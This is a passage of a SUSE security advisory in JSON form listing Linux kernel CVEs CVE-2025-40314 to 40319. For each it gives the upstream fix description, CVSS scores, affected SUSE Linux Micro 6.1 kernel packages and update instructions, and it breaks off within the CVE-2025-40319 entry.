]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40314",
"url": "https://www.suse.com/security/cve/CVE-2025-40314"
},
{
"category": "external",
"summary": "SUSE Bug 1255072 for CVE-2025-40314",
"url": "https://bugzilla.suse.com/1255072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40314"
},
{
"cve": "CVE-2025-40315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_fs: Fix epfile null pointer access after ep enable.\n\nA race condition occurs when ffs_func_eps_enable() runs concurrently\nwith ffs_data_reset(). The ffs_data_clear() called in ffs_data_reset()\nsets ffs-\u003eepfiles to NULL before resetting ffs-\u003eeps_count to 0, leading\nto a NULL pointer dereference when accessing epfile-\u003eep in\nffs_func_eps_enable() after successful usb_ep_enable().\n\nThe ffs-\u003eepfiles pointer is set to NULL in both ffs_data_clear() and\nffs_data_close() functions, and its modification is protected by the\nspinlock ffs-\u003eeps_lock. And the whole ffs_func_eps_enable() function\nis also protected by ffs-\u003eeps_lock.\n\nThus, add NULL pointer handling for ffs-\u003eepfiles in the\nffs_func_eps_enable() function to fix issues",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40315",
"url": "https://www.suse.com/security/cve/CVE-2025-40315"
},
{
"category": "external",
"summary": "SUSE Bug 1255083 for CVE-2025-40315",
"url": "https://bugzilla.suse.com/1255083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40315"
},
{
"cve": "CVE-2025-40316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Fix device use-after-free on unbind\n\nA recent change fixed device reference leaks when looking up drm\nplatform device driver data during bind() but failed to remove a partial\nfix which had been added by commit 80805b62ea5b (\"drm/mediatek: Fix\nkobject put for component sub-drivers\").\n\nThis results in a reference imbalance on component bind() failures and\non unbind() which could lead to a user-after-free.\n\nMake sure to only drop the references after retrieving the driver data\nby effectively reverting the previous partial fix.\n\nNote that holding a reference to a device does not prevent its driver\ndata from going away so there is no point in keeping the reference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40316",
"url": "https://www.suse.com/security/cve/CVE-2025-40316"
},
{
"category": "external",
"summary": "SUSE Bug 1254797 for CVE-2025-40316",
"url": "https://bugzilla.suse.com/1254797"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40316"
},
{
"cve": "CVE-2025-40317",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40317"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: slimbus: fix bus_context pointer in regmap init calls\n\nCommit 4e65bda8273c (\"ASoC: wcd934x: fix error handling in\nwcd934x_codec_parse_data()\") revealed the problem in the slimbus regmap.\nThat commit breaks audio playback, for instance, on sdm845 Thundercomm\nDragonboard 845c board:\n\n Unable to handle kernel paging request at virtual address ffff8000847cbad4\n ...\n CPU: 5 UID: 0 PID: 776 Comm: aplay Not tainted 6.18.0-rc1-00028-g7ea30958b305 #11 PREEMPT\n Hardware name: Thundercomm Dragonboard 845c (DT)\n ...\n Call trace:\n slim_xfer_msg+0x24/0x1ac [slimbus] (P)\n slim_read+0x48/0x74 [slimbus]\n regmap_slimbus_read+0x18/0x24 [regmap_slimbus]\n _regmap_raw_read+0xe8/0x174\n _regmap_bus_read+0x44/0x80\n _regmap_read+0x60/0xd8\n _regmap_update_bits+0xf4/0x140\n _regmap_select_page+0xa8/0x124\n _regmap_raw_write_impl+0x3b8/0x65c\n _regmap_bus_raw_write+0x60/0x80\n _regmap_write+0x58/0xc0\n regmap_write+0x4c/0x80\n wcd934x_hw_params+0x494/0x8b8 [snd_soc_wcd934x]\n snd_soc_dai_hw_params+0x3c/0x7c [snd_soc_core]\n __soc_pcm_hw_params+0x22c/0x634 [snd_soc_core]\n dpcm_be_dai_hw_params+0x1d4/0x38c [snd_soc_core]\n dpcm_fe_dai_hw_params+0x9c/0x17c [snd_soc_core]\n snd_pcm_hw_params+0x124/0x464 [snd_pcm]\n snd_pcm_common_ioctl+0x110c/0x1820 [snd_pcm]\n snd_pcm_ioctl+0x34/0x4c [snd_pcm]\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x104\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xec\n el0t_64_sync_handler+0xa0/0xf0\n el0t_64_sync+0x198/0x19c\n\nThe __devm_regmap_init_slimbus() started to be used instead of\n__regmap_init_slimbus() after the commit mentioned above and turns out\nthe incorrect bus_context pointer (3rd argument) was used in\n__devm_regmap_init_slimbus(). It should be just \"slimbus\" (which is equal\nto \u0026slimbus-\u003edev). Correct it. The wcd934x codec seems to be the only or\nthe first user of devm_regmap_init_slimbus() but we should fix it till\nthe point where __devm_regmap_init_slimbus() was introduced therefore\ntwo \"Fixes\" tags.\n\nWhile at this, also correct the same argument in __regmap_init_slimbus().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40317",
"url": "https://www.suse.com/security/cve/CVE-2025-40317"
},
{
"category": "external",
"summary": "SUSE Bug 1254796 for CVE-2025-40317",
"url": "https://bugzilla.suse.com/1254796"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40317"
},
{
"cve": "CVE-2025-40318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: fix race in hci_cmd_sync_dequeue_once\n\nhci_cmd_sync_dequeue_once() does lookup and then cancel\nthe entry under two separate lock sections. Meanwhile,\nhci_cmd_sync_work() can also delete the same entry,\nleading to double list_del() and \"UAF\".\n\nFix this by holding cmd_sync_work_lock across both\nlookup and cancel, so that the entry cannot be removed\nconcurrently.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40318",
"url": "https://www.suse.com/security/cve/CVE-2025-40318"
},
{
"category": "external",
"summary": "SUSE Bug 1254798 for CVE-2025-40318",
"url": "https://bugzilla.suse.com/1254798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40318"
},
{
"cve": "CVE-2025-40319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Sync pending IRQ work before freeing ring buffer\n\nFix a race where irq_work can be queued in bpf_ringbuf_commit()\nbut the ring buffer is freed before the work executes.\nIn the syzbot reproducer, a BPF program attached to sched_switch\ntriggers bpf_ringbuf_commit(), queuing an irq_work. If the ring buffer\nis freed before this work executes, the irq_work thread may accesses\nfreed memory.\nCalling `irq_work_sync(\u0026rb-\u003ework)` ensures that all pending irq_work\ncomplete before freeing the buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
